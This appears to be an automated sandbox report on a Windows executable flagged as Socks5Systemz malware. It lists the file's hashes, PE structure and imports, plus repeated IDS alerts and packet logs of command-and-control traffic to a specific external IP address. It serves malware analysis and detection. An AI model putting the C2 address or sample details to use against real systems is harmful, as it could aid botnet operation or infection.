                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.999404760619669
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:j9htknb7BQ.exe
                                                                        File size:7'246'011 bytes
                                                                        MD5:168a4450eaf205fa20bcc2d0881c830f
                                                                        SHA1:32e77548315c9d48409057ea43e59ec4be060587
                                                                        SHA256:77b07095ae775cc151b3c35088384ba9dcc722b2b5fcee7fa5a933141db67b26
                                                                        SHA512:9c634f7e858ab4b2edb0544222e3bc1524f7fee29bb368876ade3849b33747939f183e905988d40422b5178c40eb7caa6d58f4c27f455dca89f58b61c12fbaad
                                                                        SSDEEP:196608:9K2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:9DY6tiP3myRfzepXe4ny8gxzj
                                                                        TLSH:6E763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:2d2e3797b32b2b99
                                                                        Entrypoint:0x409c40
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x65765E5E [Mon Dec 11 00:57:02 2023 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FADC08139DBh
                                                                        call 00007FADC0814BE2h
                                                                        call 00007FADC0814E71h
                                                                        call 00007FADC0816EA8h
                                                                        call 00007FADC0816EEFh
                                                                        call 00007FADC081981Eh
                                                                        call 00007FADC0819985h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A2FCh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A2C5h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FADC081A3EBh
                                                                        call 00007FADC081A01Eh
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FADC08174D8h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CDE8h
                                                                        call 00007FADC0813A87h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CDE8h]
                                                                        mov dl, 01h
                                                                        mov eax, 0040738Ch
                                                                        call 00007FADC0817D67h
                                                                        mov dword ptr [0040CDECh], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A27Dh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FADC081A45Bh
                                                                        mov dword ptr [0040CDF4h], eax
                                                                        mov eax, dword ptr [0040CDF4h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FADC081A59Ah
                                                                        mov eax, dword ptr [0040CDF4h]
                                                                        mov edx, 00000028h
                                                                        call 00007FADC0818168h
                                                                        mov edx, dword ptr [000000F4h]
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        CODE0x10000x93640x94000d7ac17dafcd52a9b3ea353c32256c1dFalse0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA0xb0000x24c0x40045829356498700390b8c7afa10ea05a4False0.31640625data2.7585022150416294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x110000x2c000x2c0012ab88ff2529942b16e663a514fbedeeFalse0.32262073863636365data4.461731535554609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                        RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                        RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                        RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                        RT_STRING0x125740x2f2data0.35543766578249336
                                                                        RT_STRING0x128680x30cdata0.3871794871794872
                                                                        RT_STRING0x12b740x2cedata0.42618384401114207
                                                                        RT_STRING0x12e440x68data0.75
                                                                        RT_STRING0x12eac0xb4data0.6277777777777778
                                                                        RT_STRING0x12f600xaedata0.5344827586206896
                                                                        RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                        RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                        RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                        RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                        DLLImport
                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dllMessageBoxA
                                                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dllInitCommonControls
                                                                        advapi32.dllAdjustTokenPrivileges
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        DutchNetherlands
                                                                        EnglishUnited States
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-14T03:02:55.599843+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:02:55.599843+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:02:56.223519+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:02:56.223519+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:03:00.188392+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:03:00.188392+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54978894.232.249.18780TCP
                                                                        2024-12-14T03:03:01.776783+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54980594.232.249.18780TCP
                                                                        2024-12-14T03:03:01.776783+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54980594.232.249.18780TCP
                                                                        2024-12-14T03:03:03.473267+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54980894.232.249.18780TCP
                                                                        2024-12-14T03:03:03.473267+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54980894.232.249.18780TCP
                                                                        2024-12-14T03:03:04.078091+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54980894.232.249.18780TCP
                                                                        2024-12-14T03:03:04.078091+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54980894.232.249.18780TCP
                                                                        2024-12-14T03:03:05.665156+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:05.665156+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:06.269431+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:06.269431+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:06.873516+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:06.873516+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54981494.232.249.18780TCP
                                                                        2024-12-14T03:03:08.485516+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54982394.232.249.18780TCP
                                                                        2024-12-14T03:03:08.485516+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54982394.232.249.18780TCP
                                                                        2024-12-14T03:03:10.101196+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:10.101196+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:10.708376+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:10.708376+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:11.317374+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:11.317374+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:11.921947+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:11.921947+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54982594.232.249.18780TCP
                                                                        2024-12-14T03:03:13.508042+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54983594.232.249.18780TCP
                                                                        2024-12-14T03:03:13.508042+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54983594.232.249.18780TCP
                                                                        2024-12-14T03:03:14.105556+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54983594.232.249.18780TCP
                                                                        2024-12-14T03:03:14.105556+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54983594.232.249.18780TCP
                                                                        2024-12-14T03:03:15.692050+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54984194.232.249.18780TCP
                                                                        2024-12-14T03:03:15.692050+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54984194.232.249.18780TCP
                                                                        2024-12-14T03:03:16.306760+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54984194.232.249.18780TCP
                                                                        2024-12-14T03:03:16.306760+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54984194.232.249.18780TCP
                                                                        2024-12-14T03:03:17.892807+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54984794.232.249.18780TCP
                                                                        2024-12-14T03:03:17.892807+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54984794.232.249.18780TCP
                                                                        2024-12-14T03:03:19.468085+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54985294.232.249.18780TCP
                                                                        2024-12-14T03:03:19.468085+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54985294.232.249.18780TCP
                                                                        2024-12-14T03:03:21.044771+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54985694.232.249.18780TCP
                                                                        2024-12-14T03:03:21.044771+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54985694.232.249.18780TCP
                                                                        2024-12-14T03:03:22.655205+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54986194.232.249.18780TCP
                                                                        2024-12-14T03:03:22.655205+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54986194.232.249.18780TCP
                                                                        2024-12-14T03:03:24.257003+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54986694.232.249.18780TCP
                                                                        2024-12-14T03:03:24.257003+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54986694.232.249.18780TCP
                                                                        2024-12-14T03:03:24.859341+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54986694.232.249.18780TCP
                                                                        2024-12-14T03:03:24.859341+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54986694.232.249.18780TCP
                                                                        2024-12-14T03:03:26.438505+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54987294.232.249.18780TCP
                                                                        2024-12-14T03:03:26.438505+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54987294.232.249.18780TCP
                                                                        2024-12-14T03:03:28.022435+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54987694.232.249.18780TCP
                                                                        2024-12-14T03:03:28.022435+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54987694.232.249.18780TCP
                                                                        2024-12-14T03:03:29.809117+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54988294.232.249.18780TCP
                                                                        2024-12-14T03:03:29.809117+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54988294.232.249.18780TCP
                                                                        2024-12-14T03:03:31.399703+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54988694.232.249.18780TCP
                                                                        2024-12-14T03:03:31.399703+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54988694.232.249.18780TCP
                                                                        2024-12-14T03:03:32.982324+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54989094.232.249.18780TCP
                                                                        2024-12-14T03:03:32.982324+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54989094.232.249.18780TCP
                                                                        2024-12-14T03:03:34.569218+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54989594.232.249.18780TCP
                                                                        2024-12-14T03:03:34.569218+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54989594.232.249.18780TCP
                                                                        2024-12-14T03:03:35.171676+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54989594.232.249.18780TCP
                                                                        2024-12-14T03:03:35.171676+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54989594.232.249.18780TCP
                                                                        2024-12-14T03:03:36.746836+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54990194.232.249.18780TCP
                                                                        2024-12-14T03:03:36.746836+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54990194.232.249.18780TCP
                                                                        2024-12-14T03:03:38.392496+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54990594.232.249.18780TCP
                                                                        2024-12-14T03:03:38.392496+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54990594.232.249.18780TCP
                                                                        2024-12-14T03:03:39.995708+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54991194.232.249.18780TCP
                                                                        2024-12-14T03:03:39.995708+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54991194.232.249.18780TCP
                                                                        2024-12-14T03:03:41.677607+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54991594.232.249.18780TCP
                                                                        2024-12-14T03:03:41.677607+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54991594.232.249.18780TCP
                                                                        2024-12-14T03:03:42.283100+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54991594.232.249.18780TCP
                                                                        2024-12-14T03:03:42.283100+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54991594.232.249.18780TCP
                                                                        2024-12-14T03:03:43.859511+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54992194.232.249.18780TCP
                                                                        2024-12-14T03:03:43.859511+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54992194.232.249.18780TCP
                                                                        2024-12-14T03:03:45.435952+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54992694.232.249.18780TCP
                                                                        2024-12-14T03:03:45.435952+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54992694.232.249.18780TCP
                                                                        2024-12-14T03:03:47.021807+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54993094.232.249.18780TCP
                                                                        2024-12-14T03:03:47.021807+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54993094.232.249.18780TCP
                                                                        2024-12-14T03:03:47.629535+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54993094.232.249.18780TCP
                                                                        2024-12-14T03:03:47.629535+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54993094.232.249.18780TCP
                                                                        2024-12-14T03:03:49.207978+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:49.207978+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:49.821174+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:49.821174+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:50.426317+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:50.426317+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54993694.232.249.18780TCP
                                                                        2024-12-14T03:03:52.004211+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:52.004211+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:52.613533+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:52.613533+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:53.219153+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:53.219153+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54994494.232.249.18780TCP
                                                                        2024-12-14T03:03:54.800880+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54995194.232.249.18780TCP
                                                                        2024-12-14T03:03:54.800880+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54995194.232.249.18780TCP
                                                                        2024-12-14T03:03:55.413208+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54995194.232.249.18780TCP
                                                                        2024-12-14T03:03:55.413208+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54995194.232.249.18780TCP
                                                                        2024-12-14T03:03:57.005945+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54995794.232.249.18780TCP
                                                                        2024-12-14T03:03:57.005945+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54995794.232.249.18780TCP
                                                                        2024-12-14T03:03:58.578328+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54996294.232.249.18780TCP
                                                                        2024-12-14T03:03:58.578328+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54996294.232.249.18780TCP
                                                                        2024-12-14T03:04:00.163081+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54996694.232.249.18780TCP
                                                                        2024-12-14T03:04:00.163081+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54996694.232.249.18780TCP
                                                                        2024-12-14T03:04:01.756260+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54997294.232.249.18780TCP
                                                                        2024-12-14T03:04:01.756260+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54997294.232.249.18780TCP
                                                                        2024-12-14T03:04:03.336492+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54997694.232.249.18780TCP
                                                                        2024-12-14T03:04:03.336492+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54997694.232.249.18780TCP
                                                                        2024-12-14T03:04:05.046644+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54998294.232.249.18780TCP
                                                                        2024-12-14T03:04:05.046644+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54998294.232.249.18780TCP
                                                                        2024-12-14T03:04:06.631012+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54998694.232.249.18780TCP
                                                                        2024-12-14T03:04:06.631012+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54998694.232.249.18780TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 14, 2024 03:02:54.137293100 CET4978880192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:02:54.257214069 CET804978894.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:02:54.257498026 CET4978880192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:02:54.257744074 CET4978880192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:02:54.377528906 CET804978894.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:02:55.599689007 CET804978894.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:02:55.599843025 CET4978880192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:02:55.707192898 CET4978880192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:02:55.827033043 CET804978894.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:02:56.223267078 CET804978894.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:02:56.223519087 CET4978880192.168.2.594.232.249.187
